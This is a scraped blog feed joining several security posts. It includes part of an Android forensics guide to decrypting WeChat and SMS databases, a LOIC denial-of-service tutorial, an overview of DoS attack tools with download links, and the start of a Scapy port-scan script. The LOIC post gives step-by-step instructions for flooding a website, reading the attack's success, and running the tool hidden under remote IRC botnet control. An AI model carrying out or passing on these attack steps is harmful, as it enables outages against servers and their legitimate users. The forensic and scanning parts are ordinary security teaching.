<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn45.png" /></div>
<div style="text-align: center;">
<em>Fig: UIN value<br />
</em></div>
<span style="background-color: white;"><strong>Step 9:<br />
</strong></span><br />
<span style="background-color: white; color: black;">Input the IMEI
and UIN string, be careful there is no need to add any symbol between
these two strings. Generate the MD5 value. The key is the first 7
character as below: 9C751DC<br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn46.png" /><span style="background-color: white;"><br />
</span></div>
<div style="text-align: center;">
<em>Fig: MD5 Checksum tool<br />
</em></div>
<span style="background-color: white;"><strong>Step 10:<br />
</strong></span><br />
Now will use the most important tool – SQLCipher to decrypt the EnMicromsg.db with the pragma key we found.<br />
Use<span style="background-color: white;"> SQLCipher 2.1 to open EnMicromsg.Db and input the pragma key for extracting the database as shown –<br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn47.png" /><span style="background-color: white;"><br />
</span></div>
<div style="text-align: center;">
<span style="background-color: white;"><em>Fig – Entering Pragma Key<br />
</em></span></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn48.png" /><span style="background-color: white;"><br />
</span></div>
<div style="text-align: center;">
<span style="background-color: white;"><em>Fig: Decoded – WeChat data<br />
</em></span></div>
<span style="background-color: white;"><strong>SMS Analysis<br />
</strong></span><br />
<span style="background-color: white;">SMS and MMS are stored in the same location in android<br />
</span><br />
Text messages are stored in an SQLite database named mmssms.db.It is stored typically under the<br />
<strong>/data/data/com.android.providers.telephony/databases/mmssms.db. </strong><br />
<span style="background-color: white;"><strong>Step 1: </strong>Find<strong><br />
</strong>SMS database file location in connected device/emulator<strong><br />
</strong></span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn49.png" /><span style="background-color: white;"><strong><br />
</strong></span></div>
<span style="background-color: white;">The <strong>telephony.db</strong> database is small but contains one potentially useful source of information.<br />
</span><br />
In that, it contains <strong>siminfo</strong> directory which
contains historical data for all SIMs that have been used in the device,
including the ICCID, Phone number (if it was stored on the SIM), and
the mobile country code (MCC) / mobile network code (MNC),<span style="background-color: white;"><br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn50.png" /><span style="background-color: white;"><strong><br />
</strong></span></div>
<span style="background-color: white;"><strong>Step 2: </strong>Pull SQLite database file with ADB<br />
</span><br />
<span style="background-color: white;">For pulling the data following command can be used –<br />
</span><br />
<span style="background-color: white;"><strong>adbpull /data/data/com.android.providers.telephony/databases/mmssms.db mmssms.db</strong><br />
</span><br />
<span style="background-color: white;">With this step, </span>whole SMS database is copied locally in your working directory!<br />
<span style="background-color: white;"><strong>Step 3:<br />
</strong></span><br />
After getting a copy of SMS database manually check for fragments
using a Hex viewer, or an SQLite Viewer like oxygen forensic SQLite
viewer. This SQLite Viewer show blocks of allocated SMS data:<span style="background-color: white;"><br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn51.png" /><span style="background-color: white;"><br />
</span></div>
<strong>Step 4</strong>:<br />
<strong>mmssms.db</strong> contain database contains all information regarding SMS and MMS messages.<br />
It contains the following in the directory<br />
<strong>Part: </strong>This contains information about files attached
to an MMS. Each message will have at least two parts: an SMIL header
and the attachment. This can be seen in the mid and ct columns, as well
as the file type attached. The _data column provides the path to find
the file on the device.<br />
<strong>Pdu</strong>: This contains metadata about each MMS. The date
column identified when the message was sent or received, in the Linux
epoch format. The _id column specifies for the image. The msg_box column
shows the direction of the message 1 for received and 2 for sent
message. The address column shows the phone number of the remote user,
regardless of whether it was a sent or received the message. The date
column showed the timestamp when a message was sent in the Linux epoch
format. The type column shows the direction of the message 1 for
received and 2 for sending. The body column displays the content of the
message. The seen column indicates whether or not the message was read 0
for and unread 1 for reading; all sent messages will be marked as
unread.<br />
<strong>Words, words_content, words_segdir<br />
</strong><br />
This appears to contain duplicate content of messages; the exact purpose of this table is unclear.<br />
<strong>Sample schema for SMS<br />
</strong><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn52.png" /><span style="background-color: white;"><br />
</span></div>
<h1>
<span style="background-color: white;">Conclusion<br />
</span></h1>
<span style="background-color: white;">The </span>forensics<span style="background-color: white;">
analysis of Android phone and Android application involves different
technique than traditional forensics, as the version or security
upgrades new methods are to be researched for Android forensics. Apart
from other challenges like extracting data, bypassing screen lock and
password and recovering deleted data, maintaining the integrity of
mobile data and application data is the biggest challenge faced in any
Android Forensics. Though lots of tools are available for Forensics,
there are gaps to be filled, and a lot needs to be done in this
direction.<br />
</span><br />
<span id="tve_leads_end_content" style="border: 1px solid transparent; display: block; visibility: hidden;"></span></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-46897533007901865462016-12-14T00:44:00.000+05:302016-12-14T00:44:16.985+05:30LOIC (Low Orbit Ion Cannon) – DOS attacking tool<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
The DOS (Denial of service) attack is
one of the more powerful hacks, capable of completely taking a server
down. In this way, the server will not be able to handle the requests of
valid users. With a DOS attack, many computer systems connected to the
internet will try to flood a server with false requests, leading to a
service disruption. There are many ways in which an attacker can enact
this attack on a server system over the network or the internet. Some
hackers try this attack with their own coded tools while others use
previously available tools.</div>
<div style="text-align: justify;">
A LOIC (Low Orbit Ion Cannon) is one of
the most powerful DOS attacking tools freely available. If you follow
news related to hacking and security issues, you doubtless have been
hearing about this tool for the past several months. It has become
widely used, including in some highly-publicized attacks against the
PayPal, Mastercard and Visa servers a few months back. This tool was
also the weapon of choice implemented by the (in)famous hacker group,
Anonymous, who have claimed responsibility for many high profile hacking
attacks, among them, hacks against Sony, the FBI and other US security
agencies. The group not only used this tool, but also requested that
others download it and join Anonymous attacks via IRC.</div>
<div style="text-align: justify;">
In this brief article, I will give an
overview and operational model of the tool. There are 2 versions of the
tool: the first is the binary version, which is the original LOIC tool.
The other is web-based LOIC or JS LOIC.</div>
<div style="text-align: justify;">
<img alt="" class="alignnone" height="299" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122011_2124_LOICLowOrbi1.jpg" width="569" /></div>
<div style="text-align: justify;">
Figure 1: Original LOIC</div>
<div style="text-align: justify;">
<strong>About The Original LOIC Tool:<br />
</strong></div>
<div style="text-align: justify;">
The LOIC was originally developed by
Praetox Technologies as a stress testing application before becoming
available within the public domain. The tool is able to perform a simple
dos attack by sending a large sequence of UDP, TCP or HTTP requests to
the target server. It’s a very easy tool to use, even by those lacking
any basic knowledge of hacking. The only thing a user needs to know for
using the tool is the URL of the target. A would-be hacker need only
then select some easy options (address of target system and method of
attack) and click a button to start the attack.</div>
<div style="text-align: justify;">
The tool takes the URL of the target
server on which you want to perform the attack. You can also enter the
IP address of the target system. The IP address of the target is used in
place of an internal local network where DNS is not being used. The
tool has three chief methods of attack: TCP, UDP and HTTP. You can
select the method of attack on the target server. Some other options
include timeout, TCP/UDP message, Port and threads. See the basic screen
of the tool in the snapshot above in Figure 1.</div>
<div style="text-align: justify;">
The LOIC version used by Anonymous group
attacks was different than the original LOIC. It had an option to
connect the client to the IRC (Internet Relay Chat). This allowed the
tool to be remotely controlled, using the IRC protocol. In that case,
the user machine became part of a botnet. A botnet is a system of
compromised computer systems connected to each other via the internet,
which are in turn controlled by the attacker who directs the malware
toward his / her target. The bigger the botnet, the more powerful the
attack is.</div>
<div style="text-align: justify;">
<img alt="" height="361" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122011_2124_LOICLowOrbi2.jpg" width="702" /></div>
<div style="text-align: justify;">
Figure 2: Modified version of LOIC with an option for IRC connect</div>
<div style="text-align: justify;">
<strong>Type of attacks: </strong>As I’d
mentioned previously, the LOIC uses three different types of attacks
(TCP, UDP and HTTP). All three methods implement the same mechanism of
attack. The tool opens multiple connections to the target server and
sends a continuous sequence of messages which can be defined from the
TCP/UDP message parameter option available on the tool. In the TCP and
UDP attacks, the string is sent as a plain text but in the HTTP attack,
it is included in the contents of a HTTP GET message.</div>
<div style="text-align: justify;">
This tool continues sending requests to
the target server; after some time, the target server becomes
overloaded. In this way, the target server will no longer be able to
respond to requests from legitimate users, effectively shutting it down.</div>
<div style="text-align: justify;">
<strong>Analysis of the attack:<br />
</strong></div>
<div style="text-align: justify;">
<strong>UDP Attack: </strong>To perform
the UDP attack, select the method of attack as UDP. It has port 80 as
the default option selected, but you can change this according to your
need. Change the message string or leave it as the default.</div>
<div style="text-align: justify;">
<strong>TCP Attack: </strong>This method is similar to UDP attack. Select the type of attack as TCP to use this.</div>
<div style="text-align: justify;">
<strong>HTTP Attack: </strong>In this
attack, the tool sends HTTP requests to the target server. A web
application firewall can detect this type of attack easily.</div>
<div style="text-align: justify;">
<strong>How to use LOIC to perform a Dos attack: </strong>Just follow these simple steps to enact a DOS attack against a website (but do so at your own risk).</div>
<ul>
<li><span style="text-align: justify;"><strong>Step 1: </strong> Run the tool.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Step 2: </strong>Enter
the URL of the website in The URL field and click on Lock O. Then,
select attack method (TCP, UDP or HTTP). I will recommend TCP to start.
These 2 options are necessary to start the attack.<br />
</span></li>
</ul>
<div style="text-align: justify;">
<img alt="" class="alignnone" height="369" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122011_2124_LOICLowOrbi3.jpg" width="702" /></div>
<div style="text-align: justify;">
Figure3: LOIC in action (I painted the URL and IP white to hide the identity of the victim in snap)</div>
<ul>
<li><span style="text-align: justify;"><strong>Step 3: </strong>Change
other parameters per your choice or leave it to the default. Now click
on the Big Button labeled as “IMMA CHARGIN MAH LAZER.” You have just
mounted an attack on the target.<br />
</span></li>
</ul>
<div style="text-align: justify;">
After starting the attack you will see
some numbers in the Attack status fields. When the requested number
stops increasing, restart the LOIC or change the IP. You can also give
the UDP attack a try. Users can also set the speed of the attack by the
slider. It is set to faster as default but you can slow down it with the
slider. I don’t think anyone is going to slow down the attack.</div>
<div style="text-align: justify;">
Here’s the meaning of each field:</div>
<ul>
<li><span style="text-align: justify;"><strong>IDLE: </strong>It shows the number of threads idle. It should be zero for higher efficiency of the attack.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Connecting:</strong> This shows the number of threads that are trying to connect to the victim server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Requesting: </strong>This shows the number of threads that are requesting some information from the victim server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Downloading: </strong>This shows the number of threads that are initiating some download for some information from the server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Downloaded: </strong>This number shows how many times data downloading has been initiated from victim server on which you are attacking.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Requested: </strong>This number shows how many times a data download has been requested from victim server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Failed: </strong>This
number shows how many times the server did not respond to the request. A
larger number in this field means the server is going down. The success
of the attack can be measured by the number shown in this field.<br />
</span></li>
</ul>
<div style="text-align: justify;">
<strong>LOIC in HIVEMIND: </strong>The
windows version of LOIC has a feature called HIVEMIND. With this, users
can connect their client to an IRC server. In this way, it can be
controlled remotely, thus facilitating some risky attacks, so use this
wisely. But connecting to an IRC server will not allow a remote
administration of your machine or any other risks to your system: it
will only control your LOIC client. This method was used to collect more
people in the DDOS attack against Visa, Mastercard, and other financial
organizations that supported Wikileaks. (The attack was called
“Operation Pay-back.”)</div>
<div style="text-align: justify;">
In this mode, thousands of system
attacks on a single website to made a real impact. The more people that
joined the attack via IRC, the more powerful the attack became.</div>
<div style="text-align: justify;">
To start LOIC in HIVEMIND mode, run this command in the command prompt:</div>
<code>LOIC.exe /hivemind irc.server.address </code><br />
<div style="text-align: justify;">
After running the above command, your LOIC client will connect to <strong>irc://irc.server.adress:6667/loic<br />
</strong></div>
<div style="text-align: justify;">
You can also set more parameters in the command to use the tool in better way. Use port and channel too with the command.</div>
<code>LOIC.exe /hivemind irc.server.address 1234 #secret </code><br />
<div style="text-align: justify;">
It will connect to irc://irc.server.adress:1234/secret</div>
<div style="text-align: justify;">
<strong>HIDDEN MODE: </strong>You can
also run your LOIC in hidden mode while using it in HIVEMIND. Running in
hidden mode means LOIC will run without any visible GUI at your windows
system. Just add <strong>/HIDDDEN</strong> in your command.</div>
<code>LOIC.exe /hidden /hivemind irc.server.address </code><br />
<div style="text-align: justify;">
It will connect LOIC client to irc://irc.server.adress:6667/loic without any visible GUI on windows.</div>
<div style="text-align: justify;">
<strong>Web-based LOIC (JS LOIC):</strong> This version of LOIC was released on 9<sup>th</sup>
December, 2010. This web- based tool runs only on JavaScript-enabled
web browsers. In JS LOIC, JS stands for JavaScript This version of LOIC
sends an ID and message with lots of connections with each ID and
message. This is easier to use than the desktop version. Just visit the
web page with a single HTML file and start the attack. The attack power
of this version is same as from the desktop.</div>
<div style="text-align: justify;">
<strong>Drawbacks of using LOIC: </strong>The
main drawback of LOIC as a DOS attack tool is that it is very easy to
find the attacker. This tool does not take any precautions to hide IP
address of the origin of the attack. Attacks generated by this tool are
simple and expose the IP address of attacker in each request packet sent
to victim server to flood the request queue. If you are thinking that
we can use proxies to solve this problem, you are wrong. Attackers
cannot use proxies in these attacks because your requests will hit the
proxy server, not the target server. So you will not be able to launch a
DOS attack on the server effectively while using a proxy. But some
analysts say that this can be used with a proxy server if the proxy is
robust enough. According to them, all your request packets will be
forwarded to the server system by proxy at the end.</div>
<div style="text-align: justify;">
<strong>How to prevent the attack of LOIC: </strong>LOIC
is available for free to download and use, and can be used effectively
with very little hacking experience. Anyone that wants to can attack a
website with this tool.</div>
<div style="text-align: justify;">
As discussed above, the attack of this
tool is simple and easy to identify. A well-configured firewall is
enough to prevent the attack from being fully effective. And a server
administrator can see the request logs to identify the IP and block the
IP from the server. Every website owner or server administrators should
monitor the traffic and all the activities being performed on the
server. This can help well enough against the attack. But this will not
help you when a network of LOIC clients will fire on the server system
all at once. Protecting the server with a Firewall configured to filter
the packets sent by the LOIC is the best way to protect against the
attack.</div>
<div style="text-align: justify;">
<strong>Conclusion: </strong>In past few
months, this tool was downloaded millions of times and used against
some big websites such as Mastercard, Visa, and PayPal to support
Wikileaks. The group known as Anonymous used this tool to attack these
websites, but it was not traceable. A lot of people joined the team with
the IRC network, so no one knows who the real persons behind the group
were, within such a large network of systems used in the attacks.</div>
<div style="text-align: justify;">
Use of this tool means sending some one
threatening messages with your address and phone number. You will be
easily caught. In some countries, a DOS attack is not illegal. You can
use this tool as an individual, but this tool is not going to help you
if you will use it with your system alone. You will need a network of
systems to join your attack. This tool is easy to use and see the
demonstration of DOS attack. But try it on your own risk.</div>
<div style="text-align: justify;">
This tool is available for free on the
internet so any person can download it and create a problem for any
website. Although catching the attacker is easy, protection against such
an attack is relatively easy to achieve. I suggest each company and
server administrator make sure that their firewall is configured to
protect from the attack generated by LOIC.</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-78091237833497083362016-12-14T00:26:00.000+05:302016-12-14T00:26:03.157+05:30Introduction to Denial-of-Service Attack<div dir="ltr" style="text-align: left;" trbidi="on">
In this post, we examine the DoS (Denial of Service attack), how it
works, what’s the impact of such an attack, and some tools to perform
this kind of exploitation in different vectors.<br />
The DoS attack is one of the most destructive attacks on the web. It <span style="color: black;">attempts to exhaust the resources of the victim and </span>take down the victim’s server(s). But first, <span style="text-decoration: underline;"><strong>what it is a DoS attack?</strong></span><br />
A DoS attack, for <span style="text-decoration: underline;"><strong>D</strong></span>enial <span style="text-decoration: underline;"><strong>of</strong></span><br />
<span style="text-decoration: underline;"><strong>S</strong></span>ervice, commonly called a <span style="text-decoration: underline;"><strong>stress test</strong></span>,
consists of flooding a target with a large quantity of requests that
slows the traffic or prevents the victim from responding to legitimate
requests.<br />
You can visualize the daily DDoS attacks worldwide in real time to see the severity of this kind of attack on <a href="http://www.digitalattackmap.com/"><span style="color: #0563c1; text-decoration: underline;">http://www.digitalattackmap.com/</span></a><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer1.png" /></div>
<div style="text-align: center;">
<strong>Figure 1 Digital Map of DDos Attacks</strong></div>
It is important to understand the difference between DoS and DDoS. A
single attacker performs the DoS. Here’s an example of a simple DoS
Attack:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer2.png" /></div>
<div style="text-align: center;">
<strong>Figure 2 Simple DoS Attack</strong></div>
The DDoS attack, for Distributed Denial of Service, is a sort of DoS
attack but performed by a group of machines controlled by the hacker.
The hacker’s machine is called the <strong>Master</strong> computer, and the group of the controlled machines are called <span style="text-decoration: underline;"><strong>zombies</strong></span> or <span style="text-decoration: underline;"><strong>botnets</strong></span>.<br />
Here’s an example of a simple DDoS Attack:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer3.png" /></div>
<div style="text-align: center;">
<strong>Figure 3 DDoS Attack</strong></div>
The DoS attack can be performed in different vectors (This is not the exhaustive list):<br />
<ul>
<li><span style="text-decoration: underline;"><strong>Application Layer Attack</strong></span>: This attack is performed in the 7<sup>th</sup> layer, and both of DoS and DDoS can be used in this case.</li>
</ul>
The concept behind the attack consists of sending a high number of
requests to flood the traffic. There are multiple examples of this kind
of DoS: HTTP Flooding, DNSQF (DNS Query Flood)<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer4.png" /></div>
<div style="text-align: center;">
<strong>Figure 4 Example of HTTP Flooding attack</strong></div>
<ul>
<li><strong>Network Layer Attack</strong>: These attacks are performed in the 3<sup>rd</sup> and 4<sup>th</sup>
layer. The common case of this kind of attacks is the DDoS using
exploitation like Syn flood or DNS amplification and others, with can
cause several sorts of damage.</li>
</ul>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer5.png" /></div>
<div style="text-align: center;">
<strong>Figure 5 Network Layer Attack</strong></div>
<div style="margin-left: 35pt;">
The question now is what’s the tools that can be used to perform this kind of attacks.</div>
<div style="margin-left: 35pt;">
If you want to try if a website is down or not, you can use the following website: <a href="http://www.upordown.org/home/"><span style="color: #0563c1; text-decoration: underline;">http://www.upordown.org/home/</span></a></div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer6.png" /></div>
<div style="text-align: center;">
<strong>Figure 6 Up or Down Website Portal</strong></div>
<div style="margin-left: 35pt;">
<span style="text-decoration: underline;"><strong>Scapy</strong></span></div>
<div style="margin-left: 35pt;">
Scapy is a powerful packet manipulation tool for networks written in Python:</div>
<div style="margin-left: 35pt;">
Scapy can do many tasks like forge, decode, send, capture packets or even scanning, tracerouting and attacking networks.</div>
<div style="margin-left: 36pt;">
It’s one of the most popular and powerful DoS tools.</div>
<div style="margin-left: 36pt;">
<a href="http://opentechnation.blogspot.com/2016/12/scapy-all-in-one-networking-tool.html" target="_blank"> You can also check this article about Scapy</a></div>
<div style="margin-left: 36pt;">
<br /></div>
<strong>Download Scapy</strong>: https://github.com/secdev/scapy<br />
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer7.png" /></div>
<div style="text-align: center;">
<strong>Figure 7 Scapy</strong></div>
<div style="text-align: center;">
<br /></div>
<div style="margin-left: 36pt;">
<span style="text-decoration: underline;"><strong>Low Canon Orbit</strong></span></div>
<div style="margin-left: 35pt;">
Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack application. <span style="background-color: white; color: black;">LOIC performs a <a href="https://en.wikipedia.org/wiki/Denial-of-service_attacks">DoS attack</a> (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server.</span></div>
<div style="margin-left: 35pt;">
<br /></div>
<div style="margin-left: 36pt;">
<strong>Download LOIC: </strong>https://sourceforge.net/projects/loic/</div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer8.png" /></div>
<div style="text-align: center;">
<strong>Figure 8 Low Canon Orbit</strong></div>
<div style="margin-left: 36pt;">
<span style="background-color: white; color: #252525; text-decoration: underline;"><strong>Hing3</strong></span></div>
<div style="margin-left: 35pt;">
<span style="background-color: white; color: black;">Hping3 is a free </span>packet<span style="background-color: white; color: black;">
generator and analyzer for the TCP/IP protocol. Hping3 is useful to
security experts and can perform multiple manipulations like </span>idle scan, test firewalling rules, test IDSes also DoS attacks.</div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer9.png" /></div>
<div style="text-align: center;">
<strong>Figure 9 Hing3</strong></div>
<span style="text-decoration: underline;"><strong>DDOSIM</strong></span><br />
DDOSIM is a popular DOS attacking tool. As the name suggests, it is
used to perform DDOS attacks by simulating several zombie hosts. All
zombie hosts create full TCP connections to the target server.<br />
These are main features of DDOSIM<br />
<ul>
<li>Simulates several zombies in attack</li>
<li>Random IP addresses</li>
<li>TCP-connection-based attacks</li>
<li>Application-layer DDOS attacks</li>
<li>HTTP DDoS with valid requests</li>
<li>HTTP DDoS with invalid requests (similar to a DC++ attack)</li>
<li>SMTP DDoS</li>
</ul>
<span style="text-decoration: underline;"><strong>Download DDOSIM</strong></span>:<span style="font-size: 10pt;"> </span><span style="color: #0563c1; text-decoration: underline;">http://sourceforge.net/projects/ddosim/</span><br />
<span style="text-decoration: underline;"><strong>Slowloris</strong></span><br />
Slowloris is a low bandwidth HTTP that can perform DoS attacks.
Slowloris holds connections open by sending partial HTTP requests. He
tries to keep sockets from closing as long as possible.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer10.png" /></div>
<div style="text-align: center;">
<strong>Figure 10 Slowloris</strong></div>
<strong>Download Slowloris</strong>: https://github.com/llaera/slowloris.pl<br />
<h1>
Conclusion</h1>
There are many cases that proof how DDOS attacks are powerful:<br />
<ul>
<li><strong><em>Attack against NASDAQ</em></strong></li>
</ul>
<em>A DDOS attack caused the shutdown of NASDAQ trading market for
more than four hours, which resulted in a $9 million fine for NASDAQ</em><br />
<ul>
<li><strong>Attack against Turkey<br />
</strong></li>
</ul>
Turkey was a victim of a large attack of DDOS by Anonymous targeting
more than 400 000 websites affecting all sectors, especially banks and
public institutions that caused millions of dollars of lost.<br />
<ul>
<li><strong>Russia VS Estonia<br />
</strong></li>
</ul>
Estonia is the most connected country in the world, and it was
affected by a massive DDOS attack that paralyzed the country for two
days. No service was accessible. The attack was conducted from Russia
and it’s a big demonstration for the power of this attack<br />
The DoS attack is one of the most destructive attacks on the net and
it’s really very difficult to detect. In the next articles, we will
examine how to prevent it.</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-45156756598478534442016-12-14T00:00:00.001+05:302016-12-14T00:00:55.609+05:30Port Scanning using Scapy<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP connect scan<br />
</strong></span><br />
TCP connect is a three-way handshake between the client and the
server. If the three-way handshake takes place, then communication has
been established.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin1.jpg" width="621" /><br />
A client trying to connect to a server on port 80 initializes the
connection by sending a TCP packet with the SYN flag set and the port to
which it wants to connect (in this case port 80). If the port is open
on the server and is accepting connections, it responds with a TCP
packet with the SYN and ACK flags set. The connection is established by
the client sending an acknowledgement ACK and RST flag in the final
handshake. If this three-way handshake is completed, then the port on
the server is open.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin2.jpg" width="621" /><br />
The client sends the first handshake using the SYN flag and port to
connect to the server in a TCP packet. If the server responds with a RST
instead of a SYN-ACK, then that particular port is closed on the
server.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_131692">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">tcp_connect_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(sport</code><code class="python keyword">=</code><code class="python plain">src_port,dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"S"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(tcp_connect_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(tcp_connect_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(tcp_connect_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x12</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python plain">send_rst </code><code class="python keyword">=</code> <code class="python plain">sr(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(sport</code><code class="python keyword">=</code><code class="python plain">src_port,dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"AR"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number17 index16 alt2">
<code class="python functions">print</code> <code class="python string">"Open"</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">elif</code> <code class="python plain">(tcp_connect_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x14</code><code class="python plain">):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
</div>
</td></tr>
